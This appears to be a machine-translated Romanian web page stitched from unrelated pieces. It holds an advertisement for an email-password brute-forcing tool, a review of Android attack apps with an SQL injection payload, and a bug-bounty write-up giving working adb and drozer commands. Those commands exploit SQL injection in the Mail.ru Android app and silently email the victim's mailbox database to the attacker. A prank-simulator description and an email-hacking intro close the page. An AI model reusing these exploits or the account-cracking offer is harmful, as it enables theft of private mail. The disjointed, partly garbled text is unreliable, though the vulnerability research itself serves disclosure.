Descărcați programul pentru hacking e-mail pe Android. Cele mai bune programe de hacking pentru hacking de pe un smartphone. Utilitare de ajutor pentru hacking pentru Android

În prezent, fiecare companie și utilizator are o adresă poștală pe Internet pentru a servi atât scopurilor personale, cât și de afaceri. Utilizare servicii postale este o parte integrantă a vieții de zi cu zi. Nu este un secret pentru nimeni faptul că informațiile conținute în e-mail sunt importante, ceea ce creează cerere pentru un astfel de serviciu precum hacking-ul de e-mail. Este posibil să aveți nevoie de acces la informațiile cutiei poștale din diverse motive: poate ați pierdut parola pentru propria dvs. cutie poștală și încercați să accesați date personale. Alternativ, altcineva v-a deschis deja e-mailul și, cu cele mai „cele mai bune” intenții, v-a schimbat parola. Acum nu vă puteți accesa corespondența, dar multe informații necesare sunt stocate în cutia poștală. Software Crack.email, sau mai degrabă sistemul său funcționează pe baza parolelor de forțare brută și selectând cea mai potrivită. Un generator special de parole este încorporat în sistemul programului, care este inima întregului program în ansamblu. În ceea ce privește timpul, programul funcționează foarte repede, deoarece are foarte de mare viteză hacking Dar trebuie să rețineți că, cu cât parola este mai complexă, cu atât va dura mai mult pentru a o recupera sau sparge. Programul are, de asemenea, o probabilitate mare de a ghici parola.

Odată cu apariția Crack.email a devenit posibil să primiți:

  • Obţine acces complet la adresa poştală şi management
  • Posibilitatea de a descărca toate fișierele și documentele arhivate
  • Autentificare și parolă cont pentru a vă conecta la profilul dvs
  • Scrisorile de adresă poștală primite și trimise

Software-ul bazat pe un set de metode vă permite să selectați rapid o autentificare și o parolă pentru un cont online. Această procedură se realizează destul de rapid și nu necesită nicio intervenție din partea dvs. personal.

Mai ai întrebări? Vom fi bucuroși să le răspundem: Dacă doriți să lăsați o recenzie sau să faceți vreo sugestie, o puteți face în secțiune

Pentesting, sau pur și simplu teste de penetrare, este o modalitate legală de a face hacking real și chiar de a fi plătit pentru asta. Un audit de securitate avansat este de obicei efectuat pe un laptop cu hardware specific, dar multe defecte de securitate pot fi detectate cu ușurință folosind un smartphone și o tabletă obișnuite. În acest articol ne vom uita la 14 aplicații de hacker, care vă va permite să efectuați un test pe Android fără a scoate laptopul.

Articolul a fost scris în scop de cercetare. Toate informațiile au doar scop informativ. Nici autorul articolului, nici administrația nu sunt responsabile pentru utilizarea ilegală a programelor menționate în articol.

Programe hacker pentru hacking de pe un smartphone

Toate aplicațiile hacker pentru Android sunt împărțite în mai multe grupuri:

  • Scanerele de resurse web sunt utilitare pentru hackeri pentru căutarea vulnerabilităților.
  • Harvester - vă permit să căutați vulnerabilități (și exploatări pentru acestea) atât în ​​software, cât și în hardware. Efectuați sniffing, atacuri MITM etc.
  • Sniffer-urile sunt aplicații hacker pentru interceptarea și analiza traficului.
  • Utilitățile auxiliare sunt instrumente care ajută la pentesting.
  • Directoarele și motoarele de căutare sunt aplicații care îndeplinesc funcții auxiliare.

Crawlerele web pentru Android

Să începem revizuirea programelor de hacking a unui smartphone cu cel mai important lucru, și anume scanere de aplicații web. Aici avem trei aplicații care vă vor permite să găsiți zone de administrare deschise, să resetați parolele, să vă testați site-ul pentru vulnerabilități XSS, capabilități de injectare SQL, să creați liste de directoare și multe altele.

Scanerul de vulnerabilități pentru aplicații web mobile îl caută Kayra Pentester Lite greșeli tipiceîn configurația serverului web specificat și încearcă să obțină liste de directoare (de obicei cu succes). Instrumentele suplimentare includ un generator de hash și un decriptor AES.
Aplicația are setări simple și clare. Suportă HTTPS și verifică corectitudinea TLS. Poate căuta XSS, CGI de forță brută și poate efectua atacuri de dicționar. Poate funcționa în fundal și în modul cu mai multe fire. Conține bază Date Google Hackează și detectează automat vulnerabilitățile cunoscute.


Raport Kayra și ecran Despre

Pentru fiecare element marcat în setările de scanare, este creat un raport detaliat. Captura de ecran arată doar o mică parte din ea. Versiune gratuită destul de funcțional, dar uneori enervant cu reclame. Versiunea plătită nu are publicitate și costul la momentul scrierii este de 159 de ruble.

  • Versiunea testată: 1.4.0
  • Dimensiune: 4,7 MB
  • Versiunea Android: 4.1 și mai mare
  • Rădăcina necesară: nu

Următorul program de hacker pentru Android este DroidSQLi. Aplicația DroidSQLi este utilizată pentru a verifica site-urile web pentru vulnerabilități la patru tipuri de injecții SQL:

  • Injecție SQL normală - o versiune clasică cu trecerea parametrului UNION ALL SELECT;
  • Injecție SQL bazată pe erori - folosind o sintaxă evident incorectă în interogări pentru a primi un mesaj de eroare care dezvăluie opțiuni suplimentare DB;
  • Blind SQL injection - o serie de interogări cu analiza răspunsurilor adevărat/fals din SGBD, permițându-vă să restabiliți structura bazei de date;

Injecție SQL bazată pe timp - generarea de interogări suplimentare pentru care DBMS se întrerupe anumit timp, ceea ce face posibilă recuperarea datelor caracter cu caracter.


Demonstrarea injectării SQL bazate pe erori

Utilitarul DroidSQLi selectează automat metoda de injectare și, de asemenea, utilizează tehnici pentru a ocoli filtrarea interogărilor.

Pentru a începe testarea site-ului, trebuie să găsiți manual punctul de intrare. De obicei, aceasta este adresa unei pagini web care conține o solicitare de forma?id=X sau?p=X, unde X este un număr întreg pozitiv. În exemplul nostru, sarcina utilă pentru parametrul id arată astfel:

id = (SELECT 4777 FROM (SELECT COUNT (*), CONCAT (0x71626b6a71, (SELECT (ELT (4777 = 4777, 1))), 0x7170767871, FLOOR (RAND (0) * 2)) x FROM INFORMATION_SCHEMABY. GINS GROUP x) a)

Există o mulțime de site-uri pe Internet care sunt vulnerabile la injecțiile SQL. Cred că puteți găsi cu ușurință câteva dintre acestea doar uitându-vă la istoricul browserului dvs.

  • Versiunea testată: 1.1
  • Dimensiune: 705 KB
  • Versiunea Android: 4.2 și o versiune ulterioară
  • Rădăcina necesară: nu

Următorul instrument pentru hacking de pe smartphone-uri este utilitarul GRATUIT Droidbug Admin Panel Finder. Aplicația caută panouri de administrare folosind adresele implicite ale diferitelor CMS-uri. Rezultatul muncii sale nu corespunde întotdeauna cu starea reală a lucrurilor, deoarece serverele web populare au IDS și WAF. Ele blochează forța brută URL sau o redirecționează către un honeypot (capcană), care răspunde cu HTTP 200 OK la toate solicitările și colectează ea însăși informații despre atacator.

Cu toate acestea, pe site-urile mai puțin populare, securitatea este foarte tristă, iar un panou de administrare valid poate fi găsit în câteva secunde. Versiunea plătită, care costă 139 de ruble, elimină publicitatea și deblochează posibilitatea de a căuta folosind un șablon mixt pentru site-uri care acceptă PHP/ASP/CGI/CFM/JS.


Căutați panoul de administrare pe site
  • Versiunea testată: 1.4
  • Dimensiune: 6,3 MB
  • Versiunea Android: 2.1 și o versiune ulterioară
  • Rădăcina necesară: nu

Mașini de recoltat pentru hacking de pe un smartphone

Internetul nu este format doar din aplicații web, iar găurile nu se găsesc doar în ele. Următoarea selecție de aplicații de hacking pentru Android vă va permite să căutați vulnerabilități (și exploatări pentru acestea) în software și hardware, să efectuați sniffing, atacuri MITM, abandon și să faceți multe alte lucruri interesante.

cSploit este unul dintre cele mai puternice instrumente pentru scanarea rețelelor și căutarea vulnerabilităților pe gazdele detectate. Creează o hartă a rețelei și afișează informații despre toate dispozitivele găsite în ea. Își pot determina IP/MAC-ul și furnizorul (după primii trei octeți ai adresei MAC), pot determina sistemul de operare instalat pe ele, pot căuta vulnerabilități folosind framework-ul Metasploit RPCd și parolele de forță brută.


Căutare de clienți și atac MITM

Efectuează atacuri MITM diferite tipuri prin DNS spoofing (este posibilă înlocuirea fișierelor media din trafic din mers, injecții JS, deturnarea sesiunii și deturnarea cookie-urilor pentru autorizare fără introducerea unei parole). De asemenea, capabil să se deconecteze dispozitive individuale(sau deconectați-le în masă de la punctul de acces). Interceptează traficul și îl salvează în format .pcap sau îl redirecționează oriunde doriți.

cSploit conține un instrument pentru crearea și trimiterea oricărui pachet TCP/UDP către o gazdă selectată. Link-ul redirecționează către un serviciu online pentru selectarea și exploatarea vulnerabilităților pentru un anumit model. Baza de date a încetat să fie actualizată în 2015, dar este încă relevantă. În testul meu scurt pe un router ASUS, care a fost în producție de la sfârșitul anului 2016, o vulnerabilitate descrisă pentru prima dată în 2009 a fost descoperită în cel mai recent firmware (aprilie 2018).


Porturi deschise și o selecție de exploit-uri pentru ținta selectată

În plus, cSploit vă ajută să creați o gazdă la distanță pe o gazdă piratată, auditată de securitate și să obțineți controlul asupra acesteia control deplin. În general, acesta este un must have pentru pentesteri, și nu numai pentru ei.

  • Versiunea testată: 1.6.6 RC2
  • Dimensiune: 3,5 MB
  • Sunt disponibile versiuni de testare ale cSploit Nightly
  • Versiunea Android: 2.3 și o versiune ulterioară
  • Root necesar: DA!
  • la /system/bin

cSploit, Intercepter-NG și alte utilitare puternice merită o analiză mai detaliată în articole separate. Vă sugerăm mai întâi să vă familiarizați cu principiile de bază ale pentestingului folosind un exemplu aplicații simple, și abia apoi treceți la hardcore.

Furca cSploit de Simone Margaritelli a murit în 2014. Proiectul a rămas în stadiu beta cu cod foarte brut. În timp ce cSpoit a funcționat perfect pentru mine, ultimele trei versiuni de dSploit s-au prăbușit cu o eroare aproape imediat după lansare.


Același cSploit, vedere laterală

De când Margaritelli s-a alăturat companiei Zimperium, dezvoltările dSploit au devenit parte a utilitarului proprietar zAnti.


Scanare rețea fără firși descoperirea gazdei
  • Versiunea testată (nu complet de succes): 1.1.3c
  • Dimensiune: 11,4 MB
  • Versiunea Android: 2.3 și o versiune ulterioară
  • Necesită root: DA!
  • Cerințe suplimentare: instalați BusyBox în /system/bin, arătați o tendință spre masochism

zAnti

Aplicație mobilă pentru pentesting de la Zimperium. Un analog mai modern, mai stabil și mai vizual al dSploit.

Interfața zAnti este împărțită în două părți: scanare și MITM. În prima secțiune, precum dSploit și cSploit original, mapează rețeaua, determină toate gazdele, parametrii și vulnerabilitățile acestora.


Rețeaua Nmap

O funcție separată este detectarea vulnerabilităților pe smartphone-ul însuși. Conform raportului programului, testul nostru Nexus 5 conține 263 de găuri care nu vor mai fi închise deoarece durata de viață a dispozitivului a expirat.


Detectarea vulnerabilităților

zAnti ajută la piratarea routerelor și la obținerea accesului complet la acestea (cu posibilitatea de a schimba parola de administrator, de a seta un alt SSID, PSK și așa mai departe). Folosind atacurile MITM, zAnti detectează elemente nesigure la trei niveluri: OS, aplicații și setări ale dispozitivului.

Caracteristica cheie este generarea unui raport detaliat asupra tuturor elementelor scanate. Raportul conține explicații și sfaturi cu privire la modul de eliminare a deficiențelor constatate.


zAnti raport
  • Versiunea testată: 3.18
  • Dimensiune: 24 MB
  • Versiunea Android: 2.3 și o versiune ulterioară
  • Root necesar: DA!
  • Note: zAnti nu funcționează pe dispozitive cu procesoare x86 și x86_64

Sniffer pentru interceptarea traficului pe Android

Nici un pentester nu se poate lipsi de unul bun. Este o unealtă la fel de comună ca un cuțit pe masa unui bucătar. Prin urmare, următoarea secțiune a articolului este dedicată aplicațiilor pentru interceptarea și analiza traficului.

este un sniffer avansat axat pe efectuarea de atacuri MITM. Captează traficul și îl analizează din mers, identificând automat datele de autorizare din acesta. Poate salva traficul interceptat în format .pcap și îl poate analiza ulterior.

Formatele de date detectate automat includ parole și hash-uri pentru următoarele protocoale: AIM, BNC, CVS, DC++, FTP, HTTP, ICQ, IMAP, IRC, KRB5, LDAP, MRA, MYSQL, NTLM, ORACLE, POP3, RADIUS, SMTP, SOCKS , Telnet, VNC.


Scanare și falsificare ARP

Intercepter-NG colectează fișiere transmise prin FTP, IMAP, POP3, SMB, SMTP și HTTP din pachetele interceptate La fel ca cSploit și analogii săi, Intercepter-NG utilizează spoofing ARP pentru a efectua MITM. Acceptă SSLstrip, care vă permite să efectuați atacuri MITM chiar și cu trafic HTTPS, înlocuind din mers cererile HTTPS ale gazdelor atacate cu variantele lor HTTP prin proxy-ul DNS încorporat.

În plus, poate detecta falsificarea ARP în raport cu el însuși (utilă atunci când se conectează la hotspot-uri publice) și poate proteja împotriva acesteia. Când faceți clic pe pictograma umbrelă, memoria cache ARP este verificată.

  • Versiunea testată: 2.1 (consola - 0.8)
  • Dimensiune: 5,2 MB
  • Versiunea Android: 2.3 și o versiune ulterioară
  • Root necesar: DA!
  • Cerințe suplimentare: instalați BusyBox în /system/bin

Un analizor de pachete TCP/UDP mai simplu și „legal”, cu capacitatea de a intercepta sesiuni HTTPS folosind MITM. Nu necesită deoarece folosește încorporat Caracteristica Android transmiterea traficului prin proxy și înlocuirea unui certificat SSL.

În Android 6.0.1 și versiunile ulterioare, trebuie să adăugați manual un certificat CA prin setările aplicației.


Captarea traficului

Packet Capture rulează local. Nu efectuează spoofing ARP, deturnarea sesiunii sau alte atacuri asupra gazdelor externe. Aplicația este poziționată pentru depanare și este descărcată de pe piața oficială. Poate decoda pachetele ca Text/Hex/Urlencoded, dar nu acceptă încă solicitări HTTP comprimate (gzip).

Packet Capture facilitează monitorizarea activitatea de rețea aplicații instalate. Acesta arată nu doar volumul de trafic transmis, ci ce anume trimite fiecare program sau componentă Android încorporată și unde și ce pachete primește ca răspuns și de la ce servere. Un utilitar excelent pentru căutarea de marcaje troiene și reclame enervante.

  • Versiunea testată: 1.4.7
  • Dimensiune: 4,5 MB
  • Versiunea Android: 2.3 și o versiune ulterioară
  • Rădăcina necesară: nu

Utilitare de ajutor pentru hacking pentru Android

În timp ce utilitățile avansate de Pentest necesită root și BusyBox, aplicațiile mai simple sunt disponibile în Magazinul Play și funcționează pe orice smartphone fără niciun truc. Ele nu pot efectua spoofing ARP și atacuri MITM, dar sunt destul de suficiente pentru scanarea unei rețele wireless, detectarea gazdelor și a problemelor evidente de securitate.

Acest program scanează undele de emisie căutând puncte de acces cu WPS activat. După ce le-a descoperit, ea încearcă să încerce ace implicite pe ele. Sunt puține dintre ele și sunt cunoscute din manualele producătorului de router.

Dacă utilizatorul nu a schimbat pinul implicit și nu a dezactivat WPS, atunci utilitarul durează cel mult cinci minute pentru a sorta toate valorile cunoscute și a obține WPA(2)-PSK, indiferent cât de lung și complex ar fi acesta. Parola rețelei wireless este afișată pe ecran și salvată automat Setări Wi-Fi smartphone.


Detectare hotspot cu WPS

De când acel articol a fost publicat, WPSApp a fost actualizat și îmbunătățit în toate privințele. Ea cunoaște mai multe pini de la diferiți furnizori, le sortează mai repede și a învățat să folosească forța brută în moduri noi. Utilitarul funcționează atât pe smartphone-uri rootate, cât și fără drepturi de root. Are mulți analogi, dar toate sunt mult mai puțin eficiente.

  • Versiunea testată: 1.6.20
  • Dimensiune: 3.0 MB
  • Versiunea Android: 4.1. Funcționează mult mai bine pe Android 5.1 și versiuni ulterioare
  • Rădăcina necesară: de preferat, dar nu obligatorie

Scaner de rețea Wi-Fi gratuit și open source. Un utilitar foarte convenabil pentru detectarea punctelor de acces (inclusiv a celor ascunse), aflarea parametrilor acestora (MAC, furnizor, canal, tip de criptare), evaluarea puterii semnalului și a distanței până la acestea. Distanța de la router este calculată folosind formula pentru linia de vedere, deci nu este întotdeauna indicată suficient de precis.


Afişa rețele ascunseși evaluarea zgomotului canalului

WiFiAnalyzer vă permite să vedeți clar situația în aer, să filtrați ținte după puterea semnalului, SSID, frecvența utilizată (2,4/5 GHz) și tipul de criptare. De asemenea, puteți determina manual canalul cel mai puțin zgomotos folosind două tipuri de grafice: obișnuit și acumulat în timp.

Pe scurt, WiFiAnalyzer este locul în care ar trebui să începeți recunoașterea în rețelele wireless. Căutarea țintelor cu anumiți parametri va economisi mult timp atunci când munca in continuare cu utilități avansate.

  • Versiunea testată: 1.8.11
  • Dimensiune: 1,6 MB
  • Versiunea Android: 4.1 și o versiune ulterioară
  • Rădăcina necesară: nu

Fing

Adesea, funcționalitatea utilităților hackerilor se intersectează cu capacitățile instrumentelor complet legale care sunt utilizate administratorii de sistem pentru configurarea rețelelor.

Fing este un astfel de instrument. Scanează rapid rețeaua Wi-Fi la care ați reușit să vă conectați (de exemplu, folosind WPSApp) și identifică toate gazdele. Acest lucru poate fi necesar pentru a verifica propria rețea fără fir pentru acces neautorizat, dar, vedeți, explorarea rețelelor necunoscute este mult mai interesantă.


Definirea porturilor și serviciilor pe gazdele selectate

Fing efectuează o analiză avansată a numelor NetBIOS, UPNP și Bonjour, astfel încât identifică mai precis tipurile de dispozitive și arată mai multe proprietăți ale acestora. Fing are utilități integrate ping și tracerout. De asemenea, poate trimite solicitări WOL (Wake on LAN), trezind de la distanță dispozitivele „dormite” care acceptă această funcție.

Fing detectează automat porturi deschiseși serviciile asociate acestora. Când sunt detectate SMB, SSH, FTP și alte lucruri, Fing oferă să se conecteze la ele prin apel programe externe din meniul dvs. Dacă utilitarul corespunzător (de exemplu, AndSMB) nu este instalat, atunci Fing deschide un link pentru a-l descărca.

Funcții suplimentare ale programului sunt disponibile după înregistrarea unui cont Fing. Cu acesta puteți efectua un inventar al dispozitivelor și rețelelor. Și mai multe funcții sunt deblocate după achiziționarea hardware-ului Fingbox. Poate monitoriza conexiunea oaspeților neinvitați și poate bloca selectiv dispozitivele acestora, precum și verifica conexiunea la Internet pentru probleme tipice și le poate remedia automat.

  • Versiunea testată: 6.7.1
  • Dimensiune: 10 MB
  • Versiunea Android: 4.1 și o versiune ulterioară
  • Rădăcina necesară: nu

Aplicația detectează toate dispozitivele client dintr-o rețea fără fir și apoi folosește falsificarea ARP pentru a le dezactiva selectiv sau a întrerupe comunicațiile pentru toată lumea, cu excepția lui însuși. Și apoi puteți descărca fișiere în viteza maxima undeva într-o cafenea, urmărind cum suferă alți vizitatori.


NetCut - găsiți și loviți!

Glumă! Este necivil să faci asta, dar să lovi rapid un atacator fără a intra în setările routerului - de ce nu? Nu puteți întrerupe o singură dată conexiunea pentru orice gazdă, ci puteți bloca constant încercările acesteia de a se conecta la punctul de acces până când își schimbă adresa MAC (consultați fila închisoare).

Dacă cineva încearcă să facă un astfel de truc împotriva dispozitivului dvs., NetCut va detecta otrăvirea cache-ului ARP și îl va șterge (consultați NetCut Defender). Pentru un dolar pe lună puteți obține un cont Pro, puteți elimina reclamele și restricțiile.

  • Versiunea testată: 1.4.9
  • Dimensiune: 12 MB
  • Versiunea Android: 4.0 și o versiune ulterioară
  • Necesită root: DA!

Directoare și motoare de căutare pentru pentesteri

În cele din urmă, vă vom spune despre câteva utilități utile care nu sunt direct legate de hacking, ci mai degrabă îndeplinesc o funcție auxiliară și informațională.

Din întâmplare, în timp ce căutam prin alt BugBounty, am dat peste un lanț de vulnerabilități într-un client de e-mail destul de popular de la gigantul IT Mail.Ru. Exploatarea vulnerabilităților din acest lanț nu a necesitat drepturi speciale asupra dispozitivului și ar putea duce la compromiterea completă a conținutului căsuței poștale a victimei sau chiar a conținutului cardului SD. În articol voi descrie metodele prin care au fost găsite aceste vulnerabilități, instrumente auxiliare și vectorul final cu o demonstrație video.

Cum să piratați aplicația Mail.ru?

Primul lucru de care veți avea nevoie, desigur, este un dispozitiv (sau emulator), instrumente Android SDK, APK-ul de care avem nevoie, drozer și un set de mici utilități pentru decompilarea și analizarea codului Java. Dar mai întâi lucrurile.

Mai întâi de toate, instalați SDK Tools și configurați dispozitivul/emulatorul. Voi lua în considerare un dispozitiv real, dar numai pentru că este mai convenabil pentru mine și, în general, computerul cu emulatorul rulează se încinge! Root-ul dispozitivului vă face viața mult mai ușoară, dar nu este necesar să găsiți și să exploateți multe vulnerabilități.

După configurarea SDK Tools, descărcați și instalați drozer din depozitul oficial, instalați clientul APK pe dispozitiv. Super, pregătirile legate de dispozitiv sunt finalizate, pentru a verifica funcționalitatea acestuia - conectați-vă prin redirecționarea portului (acest lucru nu este necesar dacă utilizați un dispozitiv real din rețea și nu un emulator):

$ adb forward tcp:31415 tcp:31415 $ drozer console connect 127.0.0.1

$ adb forward tcp : 31415 tcp : 31415

$ drozer console connect 127.0.0.1

Și bineînțeles, instalăm aplicația de mail Mail.Ru pe dispozitiv, pe care o vom sparge. Dezambalăm și decompilăm aplicația folosind utilitarul dex2jar. Pentru a vizualiza și a căuta prin surse, vă recomand să utilizați JD-GUI sau puteți utiliza orice alt editor de cod la alegere. Totul este gata, să începem cercetarea.


Așa arată o consolă drozer lansată cu succes

SE CAUT UN VECTOR DE ATAC PENTRU HACKAREA APLICAȚIILOR MAIL.RU

Acum tot ce mai rămâne de făcut este să găsești vulnerabilități, să te gândești la vector și să scrii un exploit. Începem prin a scana aplicația: căutăm ceva de care să ne apucăm. Acest lucru se face folosind drozer după cum urmează:

dz> rulați app.package.attacksurface ru.mailru.app nu a putut găsi pachetul: ru.mailru.app dz> rulați app.package.attacksurface ru.mail.mailapp Suprafața de atac: 26 activități exportate 10 receptoare de difuzare exportate 2 furnizori de conținut exportat 14 servicii exportate

dz> run app .package .attacksurface ru .mailru .app

nu a putut găsi pachetul: ru .mailru .app

dz> rulați aplicația .pachet .attacksurface ru .mail .mailapp

Suprafața de atac:

26 de activități exportate

10 receptoare de transmisie exportate

2 furnizori de conținut exportați

14 servicii exportate

După cum puteți vedea, aplicația are destul de mulți furnizori de conținut exportați, așa că vă sugerez să începeți căutarea cu aceștia. Echipă rulați app.provider.info -a ru.mail. mailapp ne va oferi o listă cu doi furnizori:

ru.mail.mailbox.contacts ru.mail.mailapp.images.cache

ru .mail .mailbox .contacte

ru .mail .mailapp .images .cache

Apropo, puteți lăsa scanarea automată a furnizorului la drozer folosind comanda

dz> rulați scanner.provider.injection -a ru.mail.mailapp

dz> rulați scaner .provider .injection - a ru .mail .mailapp

Dar prefer să caut vulnerabilități manual, așa că pur și simplu încercăm să apelăm acest furnizor de conținut direct prin adb folosind comanda incep efectuate pe aparat. Din nou, deoarece furnizorul de conținut este exportat, drepturi root Nu avem nevoie.

$ adb shell am start -d "content://ru.mail.mailapp.images.cache/ image_parameters/0"" Pornire: Intenție ( dat=content://ru.mail.mailapp.images.cache/ image_parameters/0 " )

parametri_imagine/0 ""

Pornire: Intenție (dat = conținut: //ru .mail .mailapp .images .cache /

parametri_imagine / 0 ")

După cum puteți vedea, utilizatorului i se va cere să aleagă ce să facă cu această adresă URL și ce activitate să lanseze. Pentru a evita astfel de întrebări, suplimentăm comanda am cu parametrul -n și indicăm activitatea de care avem nevoie, de exemplu ru.mail.mailapp/ru.mail.ui.writemail.SharingActivity. Aplicația se va bloca imediat cu o eroare și vom rula la logcat pentru a afla care este problema.


Înlocuim un citat și obținem o eroare SQL. Clasic!

Și problema este că acesta este un tipic injecție SQL bazată pe uniune, care poate fi deztors într-un mod clasic și obține rezultatul (atât pe ecranul telefonului, cât și în jurnalul de sistem):

$ adb shell am start -d "content://ru.mail.mailapp.images.cache/ image_parameters/0) union select 1,2,3,sqlite_version(),5,6,7,8-- /" - n ru.mail.mailapp/ru.mail.ui.writemail.SharingActivity ... Început: Intenție ( dat=content://ru.mail.mailapp.images.cache/image_parameters/0) unire select 1,2,3 ,sqlite_version(),5,6,7,8-- / cmp=ru.mail.mailapp/ru.mail.ui.writemail.SharingActivity )

$ adb shell am start - d "conținut: // ru .mail .mailapp .images .cache /

image_parameters / 0 ) union select 1 , 2 , 3 , sqlite_version ( ) , 5 , 6 , 7 , 8 -- / " - n ru .mail .mailapp / ru .mail .ui .writemail .SharingActivity

. . .

Pornire: Intenție (dat = conținut: / / ru .mail .mailapp .images .cache / image_parameters / 0) union select 1, 2, 3, sqlite_version () , 5, 6, 7, 8 --

/cmp=ru.mail.mailapp/ru.mail.ui.writemail.SharingActivity)

$ adb logcat

E/BitmapFactory(15311): Imposibil de decodat fluxul: java.io.FileNotFound Excepție: /3.8.6: deschidere eșuată: ENOENT (Nu există un astfel de fișier sau director)

. . .

E/BitmapFactory (15311): Imposibil de decodat fluxul: java .io .FileNotFound

Excepție: / 3.8.6: deschidere eșuată: ENOENT (Nu există un astfel de fișier sau director)

După cum se dovedește, nu numai primul furnizor de conținut este susceptibil de injectare SQL, ci și al doilea, accesibil aplicațiilor terțe. Puteți utiliza următorul vector pentru aceasta:

$ adb shell am start -d "content://ru.mail.mailbox.contacts/account/ ") union select 1,2,3,4,3,6,7,8,9,10+" -n ru .mail.mailapp/ ru.mail.ui.writemail.SharingActivity

$ adb shell am start - d "conținut: // ru .mail .mailbox .contacts / account /

") union select 1 , 2 , 3 , 4 , 3 , 6 , 7 , 8 , 9 , 10 + " - n ru .mail .mailapp /

ru .mail .ui .writemail .SharingActivity

Pentru a înțelege de ce se întâmplă acest lucru, vă sugerez să mergeți direct la codul sursă al aplicației decompilate. Răspunsul se află în fișierul aflat la ru/mail/mailbox/content/contact/ContactsProvider.java. După cum puteți vedea, rezultatul executării funcției getContactAccount() intră direct în interogarea SQL fără a trece nicio verificare - acest lucru permite atacatorului să efectueze injecția.


Efectuăm injecția pe bază de uniune și obținem rezultatul în eroare

DECOPERIREA INJECTULUI

Dar acest lucru nu a fost suficient pentru mine, am vrut să obțin acces deplin la fișierele aplicației (printre altele, la fișierul mailbox_db), aflat în folderul de sistem în /data/data/ru.mail.mailapp/databases/, unde aplicația stochează informații de bază, inclusiv conținutul e-mailurilor. După cum probabil ați observat mai devreme, conținutul uneia dintre coloane este responsabil pentru calea către fișierul atașat scrisorii. Deoarece aplicația în sine accesează fișierul, putem indica fișiere disponibile special pentru aplicația Mail.Ru Mail, de exemplu /data/data/ru.mail.mailapp/databases/mailbox_db.

Apoi vectorul selectat va lua, de exemplu, următoarea formă:

$ adb shell am start -d "content://ru.mail.mailbox.contacts/ account/") union select 111,"%2fdata%2fdata%2fru.mail.mailapp%2fdatabases%2fmailbox_db",333,444,555,666,777,888,905,01 --+" -n ru.mail.mailapp/ru.mail.ui.writemail.SharingActivity

$ adb shell am start - d "conținut: // ru .mail .mailbox .contacts /

cont / ") union select 111," % 2fdata % 2fdata % 2fru.mail.

mailaapp % 2fbaze de date % 2fmailbox_db ", 333, 444, 555, 666, 777, 888, 99,

100500 -- + "- n ru .mail .mailapp / ru .mail .ui .writemail .SharingActivity

Judecând după faptul că fișierul este atașat și dimensiunea lui reală este indicată mai jos, putem concluziona că vectorul a funcționat cu succes și am „încărcat” obiectul care ne interesează în scrisoare. Totul ar fi bine, dar totuși trebuie ca utilizatorul să trimită această scrisoare cu fișierul atașat...

Deoarece avem acces la unele activități exportate, printre acestea putem găsi următoarele - ru.mail.ui.writemail. MailToMySelfActivity, care este responsabil pentru trimiterea automată a scrisorilor către „însuți”. Îl folosim în vectorul de atac final, astfel încât scrisoarea să fie trimisă imediat fără nicio participare din partea utilizatorului. Adăugăm vectorul anterior și indicăm e-mailul nostru și alte date care urmează să fie trimise ca extra. Acești parametri, apropo, pot fi găsiți cu ușurință și în codul sursă (literal prin căutarea prin surse). Dar cumva le-am ghicit destul de repede și fără niciun indiciu.
„.intenție .extra .SUBIECTUL

„PWND” -- esa Android .intent .extra .EMAIL " [email protected]"-n

ru .mail .mailapp / ru .mail .ui .writemail .MailToMySelfActivity

unde EMAIL este căsuța noastră poștală, la care va fi trimisă o scrisoare cu fișierul specificat (în acest caz este un fișier /data/data/ru.mail.mailapp/databases/mailbox_db).

Ce se întâmplă după rularea acestei comenzi? Aplicația va porni, vectorul va încărca fișierul specificat prin injecție SQL și va trimite o scrisoare „la sine”, fără a ignora extrasele noastre transmise. O demonstrație a modului în care funcționează exploit-ul poate fi văzută în videoclip.

REZULTAT

Astfel, folosind tehnica descrisă, putem, fără drepturi de root, nu numai să efectuăm interogări SQL pe unele tabele disponibile, ci și să primim și să îmbinam toate fișierele disponibile pentru aplicație. Repet că acest vector nu necesită nicio acțiune asupra telefonului în sine. De asemenea, este de remarcat faptul că oricine poate folosi acest atac. aplicație terță parte instalat pe dispozitiv. Mai ales pentru a realiza astfel de atacuri pe piața neagră, există un serviciu de „instalații” de către dumneavoastră aplicație rău intenționată pe număr mare dispozitive ale utilizatorilor nebănuiți.

Desigur, am raportat toate vulnerabilitățile în BugBounty Mail.Ru, dar, din păcate, nu am primit nicio recompensă, iar răspunsul oficial a fost următorul:

„Puțini furnizori de conținut și activități exportate greșit au vulnerabilități, permițând accesul și manipularea datelor aplicației. Acest raport a fost marcat ca duplicat din cauza activităților cunoscute, iar furnizorii de conținut sunt exportați din greșeală (remedierea este în curs de dezvoltare).”

De ce s-a schimbat starea raportului în Nimic aplicabil, chiar dacă vulnerabilitățile erau prezente în cerere oficială la momentul raportului? Nu știu, dar acum nu prea vreau să continui să caut vulnerabilități în produsele și serviciile Mail.Ru. Sper că alții vor fi mai buni la asta decât mine, oricum - mult succes! 🙂

Descărcați Hacking Mail Simulator APK pentru Android, fișierul APK numit mobi.avva.mailvzlom și compania de dezvoltare a aplicațiilor este Avva. Mai recent Android APK Vesion Hack Mail Simulator poate descărca gratuit APK-ul apoi instalați pe telefonul Android.

Hacking Mail Simulator APK Descriere

Această aplicație simulează piratarea contului e-mailși obținerea accesului la poștă. Îți poți face o glumă cu măiestrie pe colegul tău de clasă, prietenul sau colegul prefăcându-se că îi sparge e-mailul chiar în fața ochilor lui. Acesta este o adevărată comoară de glume. Impresionează-ți prietenii și familia cu abilitățile tale de hacking și hacking! Ei vor avea de fapt încredere în tine și vor fi uimiți de abilitățile tale dacă faci lucrurile rapid și corect. Nu uitați, această aplicație este un simulator de farse, simulează doar hacking-ul de e-mail și este concepută pentru a juca farse prietenilor și familiei. În câmpul de parolă este generată o secvență aleatorie de caractere. Această aplicație nu are nimic de-a face cu programele reale de hacking mail.

După cum știți, Ostap Bender știa 400 de moduri relativ sincere de a lua bani. Din păcate, nu ne putem lăuda cu o asemenea bogăție, dar vom încerca să strângem o duzină.

În acest articol nu vom spune doar teoria, ci vom arăta și practica hacking-ului. Metodele de hacking de e-mail sunt afișate doar din motive academice și nu suntem responsabili pentru acțiunile ilegale comise de terți după citirea acestui articol. Scopul articolului este de a arăta utilizatorii și administratorii opțiuni posibile hacking ca să știi cum să te protejezi de ele. Am testat metodele descrise în articol despre angajații noștri și am fost destul de surprinși de rezultatele obținute. Prin urmare, acest articol poate fi considerat un ghid al administratorului pentru verificarea securității e-mailului într-o întreprindere.

